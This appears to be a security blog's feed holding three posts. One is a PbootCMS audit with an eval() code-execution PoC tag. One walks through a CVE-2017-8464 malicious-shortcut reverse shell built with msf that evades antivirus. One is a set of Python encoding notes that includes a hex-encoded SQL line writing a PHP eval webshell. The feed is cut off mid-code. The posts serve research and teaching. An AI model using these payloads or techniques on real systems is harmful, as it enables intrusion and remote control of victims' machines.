<content type="html"><![CDATA[<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PBOOT CMS! Thinks what you think, and makes everything possible!</span><br><span class="line"></span><br><span class="line">PBOOT CMS! Made for what you want, and makes everything possible!</span><br><span class="line"></span><br><span class="line">PBOOT CMS! Does what you want, and makes everything possible!</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>I'm a beginner at PHP code auditing, so I'm starting with a D-tier CMS.</p><p>Default backend account: <code>admin</code>, password: <code>123456</code></p><p>Code auditing approaches fall into:</p><ul><li>tracing dangerous functions</li><li>reading the whole code base</li><li>combined black-box and white-box auditing</li></ul><h1 id="开发者标签手册"><a href="#开发者标签手册" class="headerlink" title="Developer tag manual"></a>Developer tag manual</h1><h2 id="IF条件语句"><a href="#IF条件语句" class="headerlink" title="IF conditional statements"></a>IF conditional statements</h2><ul><li><code>Note: strings in a condition must be wrapped in single or double quotes, and the condition may also use native PHP code; all calls to other tags are strings and need single quotes.</code></li></ul><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">{pboot:<span class="keyword">if</span>(<span class="string">'a'</span>==<span class="string">'b'</span>)}</span><br><span class="line">内容<span class="number">1</span></span><br><span class="line">{<span class="keyword">else</span>}</span><br><span class="line">内容<span class="number">2</span></span><br><span class="line">{/pboot:<span class="keyword">if</span>}</span><br></pre></td></tr></table></figure><ul><li>Example 1: using a PHP function inside IF:</li></ul><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{pboot:<span 
class="keyword">if</span>(date(<span class="string">'Y'</span>)==<span class="number">2018</span>)}<span class="number">2018</span>年{/pboot:<span class="keyword">if</span>} </span><br></pre></td></tr></table></figure><ul><li><p>Example 2: highlighting the current navigation column:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><div <span class="class"><span class="keyword">class</span>="<span class="title">nav</span>"></span></span><br><span class="line"><span class="class"><<span class="title">dl</span>></span></span><br><span class="line"><span class="class"> <<span class="title">dt</span>><<span class="title">a</span> <span class="title">href</span>="</span>{pboot:sitepath}/<span class="string">" {pboot:if(0=='{sort:scode}')}class='active'{/pboot:if}>首页</a></dt></span></span><br><span class="line"><span class="string"></dl></span></span><br><span class="line"><span class="string">{pboot:nav parent=0}</span></span><br><span class="line"><span class="string"><dl></span></span><br><span class="line"><span class="string"><dt><a href="</span>[nav:link]<span class="string">" {pboot:if('[nav:scode]'=='{sort:tcode}')}class='active'{/pboot:if}>[nav:name]</a></dt></span></span><br><span class="line"><span class="string"><dd></span></span><br><span class="line"><span class="string">{pboot:2nav parent=[nav:scode]}</span></span><br><span class="line"><span class="string"><a href="</span>[<span class="number">2</span>nav:link]<span class="string">" 
{pboot:if('[2nav:scode]'=='{sort:scode}')}class='active'{/pboot:if}>[2nav:name]</a> |</span></span><br><span class="line"><span class="string">{/pboot:2nav}</span></span><br><span class="line"><span class="string"></dd></span></span><br><span class="line"><span class="string"></dl></span></span><br><span class="line"><span class="string">{/pboot:nav}</span></span><br><span class="line"><span class="string"></div></span></span><br></pre></td></tr></table></figure></li><li><p>Example 3: nested IF:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">{pboot:<span class="keyword">if</span>(<span class="string">'a'</span>==<span class="string">'b'</span>)}</span><br><span class="line">{pboot:<span class="number">2</span><span class="keyword">if</span>(<span class="string">'a'</span>==<span class="string">'b'</span>)}</span><br><span class="line">内容<span class="number">1</span></span><br><span class="line">{<span class="number">2</span><span class="keyword">else</span>}</span><br><span class="line">内容<span class="number">2</span></span><br><span class="line">{/pboot:<span class="number">2</span><span class="keyword">if</span>}</span><br><span class="line">{<span class="keyword">else</span>}</span><br><span class="line">内容<span class="number">3</span></span><br><span class="line">{/pboot:<span class="keyword">if</span>}</span><br></pre></td></tr></table></figure></li></ul><p>This says PHP statements can be executed, but they have to be placed inside an <code>IF conditional tag</code>, for example:</p><p><code>{pboot:if(PHP statement)} {/pboot:if}</code></p><p>Then go back to the source file and look at it:</p><p>That file is the tag-parsing engine controller, i.e. the code that parses the tags.</p><p>Lines <code>1273~1314</code> of the code deal with the IF conditional statement.</p><p><code>/apps/home/controller/ParserController.php</code></p><figure 
class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// parse IF conditional tags</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">parserIfLabel</span>(<span class="params"><span class="variable">$content</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$pattern</span> = <span class="string">'/\{pboot:if\(([^}]+)\)\}([\s\S]*?)\{\/pboot:if\}/'</span>;</span><br><span class="line"> <span 
class="variable">$pattern2</span> = <span class="string">'/pboot:([0-9])+if/'</span>;</span><br><span class="line"> <span class="keyword">if</span> (preg_match_all(<span class="variable">$pattern</span>, <span class="variable">$content</span>, <span class="variable">$matches</span>)) {</span><br><span class="line"> <span class="variable">$count</span> = count(<span class="variable">$matches</span>[<span class="number">0</span>]);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$count</span>; <span class="variable">$i</span> ++) {</span><br><span class="line"> <span class="variable">$flag</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">eval</span>(<span class="string">'if('</span> . <span class="variable">$matches</span>[<span class="number">1</span>][<span class="variable">$i</span>] . 
<span class="string">'){$flag="if";}else{$flag="else";}'</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="string">'/([\s\S]*)?\{else\}([\s\S]*)?/'</span>, <span class="variable">$matches</span>[<span class="number">2</span>][<span class="variable">$i</span>], <span class="variable">$matches2</span>)) { <span class="comment">// check whether an else branch exists</span></span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$flag</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'if'</span>: <span class="comment">// condition is true</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$matches2</span>[<span class="number">1</span>])) {</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="variable">$matches2</span>[<span class="number">1</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'else'</span>: <span class="comment">// condition is false</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$matches2</span>[<span class="number">2</span>])) {</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="variable">$matches2</span>[<span class="number">2</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">elseif</span> (<span class="variable">$flag</span> == <span class="string">'if'</span>) {</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="variable">$matches</span>[<span class="number">2</span>][<span 
class="variable">$i</span>];</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// unlimited nested parsing</span></span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="variable">$pattern2</span>, <span class="variable">$out_html</span>, <span class="variable">$matches3</span>)) {</span><br><span class="line"> <span class="variable">$out_html</span> = str_replace(<span class="string">'pboot:'</span> . <span class="variable">$matches3</span>[<span class="number">1</span>] . <span class="string">'if'</span>, <span class="string">'pboot:if'</span>, <span class="variable">$out_html</span>);</span><br><span class="line"> <span class="variable">$out_html</span> = str_replace(<span class="string">'{'</span> . <span class="variable">$matches3</span>[<span class="number">1</span>] . <span class="string">'else}'</span>, <span class="string">'{else}'</span>, <span class="variable">$out_html</span>);</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="keyword">$this</span>->parserIfLabel(<span class="variable">$out_html</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// perform the replacement</span></span><br><span class="line"> <span class="variable">$content</span> = str_replace(<span class="variable">$matches</span>[<span class="number">0</span>][<span class="variable">$i</span>], <span class="variable">$out_html</span>, <span class="variable">$content</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$content</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The key part is:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$pattern</span> = <span class="string">'/\{pboot:if\(([^}]+)\)\}([\s\S]*?)\{\/pboot:if\}/'</span>;</span><br><span class="line"><span class="variable">$pattern2</span> = <span class="string">'/pboot:([0-9])+if/'</span>;</span><br><span class="line"><span class="keyword">if</span> (preg_match_all(<span class="variable">$pattern</span>, <span class="variable">$content</span>, <span class="variable">$matches</span>)) {</span><br><span class="line"> <span class="variable">$count</span> = count(<span class="variable">$matches</span>[<span class="number">0</span>]);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$count</span>; <span class="variable">$i</span> ++) {</span><br><span class="line"> <span class="variable">$flag</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="variable">$out_html</span> = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">eval</span>(<span class="string">'if('</span> . <span class="variable">$matches</span>[<span class="number">1</span>][<span class="variable">$i</span>] . 
<span class="string">'){$flag="if";}else{$flag="else";}'</span>);</span><br></pre></td></tr></table></figure><p>After nothing more than a simple regex match the value is assigned and then run through <code>eval()</code>.</p><p>At this point we need to look for a place to use it.</p><h1 id="Poc"><a href="#Poc" class="headerlink" title="Poc"></a>Poc</h1><p>Poc:</p><p><code>{pboot:if(phpinfo())}!{/pboot:if}</code></p><p>After searching, it turned out that practically anywhere the backend allows editing, an <code>IF conditional tag</code> can be inserted and will be parsed and executed.</p><p><img src="/image/pbootcms/poc.png" alt="poc.png"></p><p>Visiting the home page then shows the <code>phpinfo</code> page</p><p><img src="/image/phpinfo.png" alt="phpinfo.png"></p><p>I then tried several times in several places and got a shell each time.</p><h1 id="另外"><a href="#另外" class="headerlink" title="Also"></a>Also</h1><p>There is a CSRF at one point in the front end that can be used to modify backend content, but every change displays a <code>modification succeeded</code> page, so the content cannot be changed without the user noticing; <code>CSRF + IF conditional tag</code> is therefore of limited use.</p><p><img src="/image/pbootcms/mod.png" alt="mod.png"></p>]]></content>
<summary type="html"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PBOOT CMS! Thinks what you think, and makes everything possible!</span><br><span class="line"></span><br><span class="line">PBOOT CMS! Made for what you want, and makes everything possible!</span><br><span class="line"></span><br><span class="line">PBOOT CMS! Does what you want, and makes everything possible!</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="代码审计" scheme="https://cr4ckm3.top/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="CMS" scheme="https://cr4ckm3.top/tags/CMS/"/>
</entry>
<entry>
<title>An xxx triggered by a shortcut</title>
<link href="https://cr4ckm3.top/2017/06/16/%E4%B8%80%E4%B8%AA%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%BC%95%E5%8F%91%E7%9A%84%E9%92%93%E9%B1%BC%E4%BA%8B%E4%BB%B6(%20CVE-2017-8464%20)/"/>
<id>https://cr4ckm3.top/2017/06/16/%E4%B8%80%E4%B8%AA%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E5%BC%95%E5%8F%91%E7%9A%84%E9%92%93%E9%B1%BC%E4%BA%8B%E4%BB%B6(%20CVE-2017-8464%20)/</id>
<published>2017-06-16T06:04:51.000Z</published>
<updated>2019-08-30T10:00:41.573Z</updated>
<content type="html"><![CDATA[<center><h1>"Disclaimer: this article is intended for security testing and offensive/defensive research reference only; anyone using it for illegal purposes bears the consequences."</h1></center><span id="more"></span><p>A couple of days ago, scrolling through WeChat Moments, I saw a post about a new Windows vulnerability: click one shortcut and you get a reverse shell. That immediately caught my interest.<br><a href="http://bobao.360.cn/learning/detail/3977.html">An article on Anquanke</a></p><h2 id="0x00-CVE-2017-8464-震网三代"><a href="#0x00-CVE-2017-8464-震网三代" class="headerlink" title="0x00 CVE-2017-8464 (震网三代)"></a>0x00 CVE-2017-8464 (Stuxnet III)</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">Vulnerability ID: CVE-2017-8464</span><br><span class="line"></span><br><span class="line">Severity: Critical</span><br><span class="line"></span><br><span class="line">Summary: if a user opens a maliciously crafted LNK file, remote code execution results. An attacker who successfully exploits this vulnerability gains the same user rights as the local user.</span><br><span class="line"></span><br><span class="line">An attacker can deliver a malicious LNK file and its associated malicious binary to users via a removable drive (USB stick) or a remote share. When the user opens the malicious LNK file in Windows Explorer or any other program that parses LNK files, the associated malicious binary is executed on the target system.</span><br><span class="line"></span><br><span class="line">Affected versions</span><br><span class="line"></span><br><span class="line">Desktop: Windows 10, 7, 8.1, 8, Vista and Windows RT 8.1</span><br><span class="line"></span><br><span class="line">Server: Windows Server 2016, 2012, 2008</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464">Microsoft Security Response Center</a></p><p>From the link above, Microsoft announced the patch on June 13.<br>As of June 16, when I reproduced it, getting a shell was still quite easy.</p><h2 id="0x01-设置监听端"><a href="#0x01-设置监听端" class="headerlink" title="0x01 设置监听端"></a>0x01 Set up the listener</h2><p>First, use msf to generate a Windows reverse-shell payload: <code>cherry.ps1</code><br><img src="/image/%E7%AC%AC%E4%B8%80%E6%AD%A5.png" alt="第一步"></p><p>Next, start a listener in msf and set the payload<br><img src="/image/%E7%AC%AC%E4%BA%8C%E6%AD%A5.png" alt="第二步"><br><img src="/image/%E7%AC%AC%E4%B8%89%E6%AD%A5.png"></p><p>The listener is now ready. Next comes deploying the backdoor on the server side and creating the malicious shortcut.</p><h2 id="0x02-部署服务器端"><a href="#0x02-部署服务器端" class="headerlink" title="0x02 部署服务器端"></a>0x02 Deploy the server side</h2><p>Here I used Python's simple HTTP server.<br><img src="/image/%E5%BC%80%E5%90%AF%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8.png" alt="简易的HTTP服务"></p><p>When the shortcut is clicked on the target machine, it requests the <code>cherry.ps1</code> backdoor from the server.</p><h2 id="0x03-生成快捷方式"><a href="#0x03-生成快捷方式" class="headerlink" title="0x03 生成快捷方式"></a>0x03 Generate the shortcut</h2><p>Generate a shortcut that points at the remote code<br><img src="/image/%E7%AC%AC%E5%9B%9B%E6%AD%A5.png" alt="lnk"></p><p><img src="/image/%E5%AF%B9%E6%AF%94.png" alt="duibi"></p><p>On the left is the generated shortcut's original icon; on the right, the icon after replacement.</p><p>From the outside, I doubt anyone could tell them apart. I suspect nobody right-clicks a desktop shortcut to check its properties before opening it, either.</p><h2 id="0x04-反弹shell"><a href="#0x04-反弹shell" class="headerlink" title="0x04 反弹shell"></a>0x04 Reverse shell</h2><p>Once the user clicks the malicious shortcut, the listener receives the reverse shell.</p><p><img src="/image/getshell.png" alt="getshell"><br>So, success!</p><h2 id="0x05-关于样本"><a href="#0x05-关于样本" class="headerlink" title="0x05 关于样本"></a>0x05 About the sample</h2><p>Submitting the generated malicious shortcut for scanning, only 6 engines detected it as a malicious script.<br><img src="/image/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90.png" alt="1"><br><img src="/image/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%902.png" alt="2"><br><img src="/image/%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%903.png" alt="3"></p><p>As of the time I uploaded it for scanning, Baidu, 360, Tencent and Kingsoft had all failed to flag it.</p>]]></content>
<summary type="html"><center><h1>"Disclaimer: this article is intended for security testing and offensive/defensive research reference only; anyone using it for illegal purposes bears the consequences."</h1></center></summary>
<category term="漏洞" scheme="https://cr4ckm3.top/tags/%E6%BC%8F%E6%B4%9E/"/>
<category term="CVE" scheme="https://cr4ckm3.top/tags/CVE/"/>
</entry>
<entry>
<title>Python encoding conversion</title>
<link href="https://cr4ckm3.top/2017/06/07/python%E7%BC%96%E7%A0%81/"/>
<id>https://cr4ckm3.top/2017/06/07/python%E7%BC%96%E7%A0%81/</id>
<published>2017-06-07T12:55:00.000Z</published>
<updated>2019-08-30T10:00:44.373Z</updated>
<content type="html"><![CDATA[<h1 id="Python编码转换"><a href="#Python编码转换" class="headerlink" title="Python编码转换"></a><div style="text-align:center">Python encoding conversion</div></h1><h1 id="Python-2-lt-——-gt-Python-3"><a href="#Python-2-lt-——-gt-Python-3" class="headerlink" title="Python 2 <——> Python 3"></a>Python 2 <——> Python 3</h1><p>Example: <code>a = '\xc4\xe3\xba\xc3'</code></p><p>In <code>Python 2</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a </span><br><span class="line"><span class="string">'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> a</span><br><span class="line">你好</span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">u'\u4f60\u597d'</span></span><br><span class="line"><span class="meta">>>> </span>a</span><br><span class="line"><span class="string">u'\u4f60\u597d'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> a</span><br><span class="line">你好</span><br><span class="line"><span class="meta">>>> </span>b = <span class="string">b'\xe4\xbd\xa0\xe5\xa5\xbd'</span></span><br><span class="line"><span class="meta">>>> </span>b</span><br><span class="line"><span class="string">'\xe4\xbd\xa0\xe5\xa5\xbd'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> b</span><br><span class="line">浣犲ソ</span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> b.encode(<span class="string">'utf8'</span>)</span><br><span class="line">你好</span><br><span class="line"><span class="meta">>>> </span>b.encode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="string">'e4bda0e5a5bd'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>In <code>Python 3</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span>a </span><br><span class="line"><span class="string">'你好'</span></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">u'\u4f60\u597d'</span></span><br><span class="line"><span class="meta">>>> </span>a</span><br><span class="line"><span class="string">'你好'</span></span><br><span class="line"><span class="meta">>>> </span>a.encode(<span class="string">'gbk'</span>)</span><br><span class="line"><span class="string">b'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span>b = a.encode(<span class="string">'utf-8'</span>)</span><br><span class="line"><span class="string">b'\xe4\xbd\xa0\xe5\xa5\xbd'</span></span><br><span class="line"><span class="meta">>>> </span>b.decode(<span class="string">'utf-8'</span>)</span><br><span class="line"><span class="string">'你好'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><ul><li>Python 2 defaults to <code>ascii</code> encoding</li><li>Python 3 defaults to <code>utf-8</code> encoding</li></ul><p>For example<br><code>a = '你好'</code></p><h2 id="在Python-2-中"><a href="#在Python-2-中" class="headerlink" title="在Python 2 中"></a>In Python 2</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">'你好'</span></span><br><span class="line"><span class="meta">>>> </span>a</span><br><span class="line"><span class="string">'\xc4\xe3\xba\xc3'</span></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">u'你好'</span></span><br><span class="line"><span class="string">u'\u4f60\u597d'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x01-HEXtoUTF8"><a href="#0x01-HEXtoUTF8" class="headerlink" title="0x01 HEXtoUTF8"></a>0x01 HEXtoUTF8</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span>a = <span class="string">'e6bc8fe6b49ee6a380e6b58be8a1a8'</span></span><br><span class="line"><span class="meta">>>> </span>a.decode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="string">'\xe6\xbc\x8f\xe6\xb4\x9e\xe6\xa3\x80\xe6\xb5\x8b\xe8\xa1\xa8'</span></span><br><span class="line"><span class="meta">>>> </span>a.decode(<span class="string">'hex'</span>).decode(<span class="string">'utf8'</span>)</span><br><span class="line"><span class="string">u'\u6f0f\u6d1e\u68c0\u6d4b\u8868'</span></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> a.decode(<span class="string">'hex'</span>).decode(<span class="string">'utf8'</span>)</span><br><span class="line">漏洞检测列表</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x02-URL编码"><a href="#0x02-URL编码" class="headerlink" title="0x02 URL编码"></a>0x02 URL encoding</h1><p>URL encoding is the format browsers use to package form input.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">from</span> urllib <span class="keyword">import</span> *</span><br><span class="line"><span class="meta">>>> </span>quote(<span class="string">"<script>alert(1)</script>"</span>) <span class="comment">#URL encode</span></span><br><span class="line"><span class="string">'%3Cscript%3Ealert%281%29%3C/script%3E'</span></span><br><span class="line"><span class="meta">>>> </span>unquote(<span class="string">'%3Cscript%3Ealert%281%29%3C/script%3E'</span>) <span class="comment">#URL decode</span></span><br><span class="line"><span class="string">'<script>alert(1)</script>'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x03-Base64"><a href="#0x03-Base64" class="headerlink" title="0x03 Base64"></a>0x03 Base64</h1><p>Base64 is commonly used for parameters in web forms and HTTP transfers, and also in mail protocols for carrying user information.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">import</span> base64</span><br><span class="line"><span class="meta">>>> </span>base64.b64encode(<span class="string">"admin"</span>) <span class="comment">#base64 encode</span></span><br><span class="line"><span class="string">'YWRtaW4='</span></span><br><span class="line"><span class="meta">>>> </span>base64.b64decode(<span class="string">'YWRtaW4='</span>)</span><br><span class="line"><span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>base32</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">import</span> base64</span><br><span class="line"><span class="meta">>>> </span>base64.b32encode(<span class="string">'admin'</span>) <span class="comment">#base32 encode</span></span><br><span class="line"><span class="string">'MFSG22LO'</span></span><br><span class="line"><span class="meta">>>> </span>base64.b32decode(<span class="string">'MFSG22LO'</span>) <span class="comment">#base32 decode</span></span><br><span class="line"><span class="string">'admin'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x04-md5"><a href="#0x04-md5" class="headerlink" title="0x04 md5"></a>0x04 md5</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="keyword">from</span> hashlib <span class="keyword">import</span> md5</span><br><span class="line"><span class="meta">>>> </span>m = md5()</span><br><span class="line"><span class="meta">>>> </span>m.update(<span class="string">'admin'</span>)</span><br><span class="line"><span class="meta">>>> </span>m.hexdigest()</span><br><span class="line"><span class="string">'f6fdffe48c908deb0f4c3bd36c032e72'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x04-Unicode转中文-万国码"><a href="#0x04-Unicode转中文-万国码" class="headerlink" title="0x04 Unicode转中文(万国码)"></a>0x04 Unicode to Chinese</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">>>> </span><span class="built_in">print</span> <span class="string">u'\u9a8c\u8bc1\u7801\u9519\u8bef'</span></span><br><span class="line">验证码错误</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="0x05-Hex"><a href="#0x05-Hex" class="headerlink" title="0x05 Hex"></a>0x05 Hex</h1><p>In MySQL injection, hex can be used to get past the htmlspecialchars() function and write a webshell.</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="number">0x3c3f70687020406576616c28245f504f53545b615d293b203f3e</span> <span class="keyword">into</span> outfile <span class="string">'/web/1.php'</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Hex encode/decode</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 